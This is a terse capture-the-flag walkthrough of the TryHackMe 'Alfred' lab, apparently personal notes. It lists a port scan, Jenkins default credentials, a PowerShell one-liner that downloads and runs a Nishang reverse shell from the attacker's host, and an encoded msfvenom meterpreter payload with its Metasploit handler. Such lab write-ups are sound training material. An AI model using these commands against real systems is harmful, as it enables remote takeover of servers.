Skip to content

THM - Alfred

Nmap

nmap -p- -A 10.10.75.158 -o alfred.nmap

Jenkins

  • http://10.10.75.158:8080
  • admin:admin

Get initial access

Get payload

  • https://github.com/samratashok/nishang

Revers shell

On hacker machine

listener

nc -nvlp 4443

static web server

python3 -m http.server

On target machine

powershell iex (New-Object Net.WebClient).DownloadString('http://10.18.9.175:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.18.9.175 -Port 4443
  • Add this script as Command in Project configuration for Jenkins

Switching Shells

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.18.9.175 LPORT=4442 -f exe -o msf_shell.exe
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.18.9.175:8000/msf_shell.exe','msf_shell.exe')"
use exploit/multi/handler 
set PAYLOAD windows/meterpreter/reverse_tcp 
set LHOST 10.18.9.175 
set LPORT 4442 
run
Start-Process "msf_shell.exe"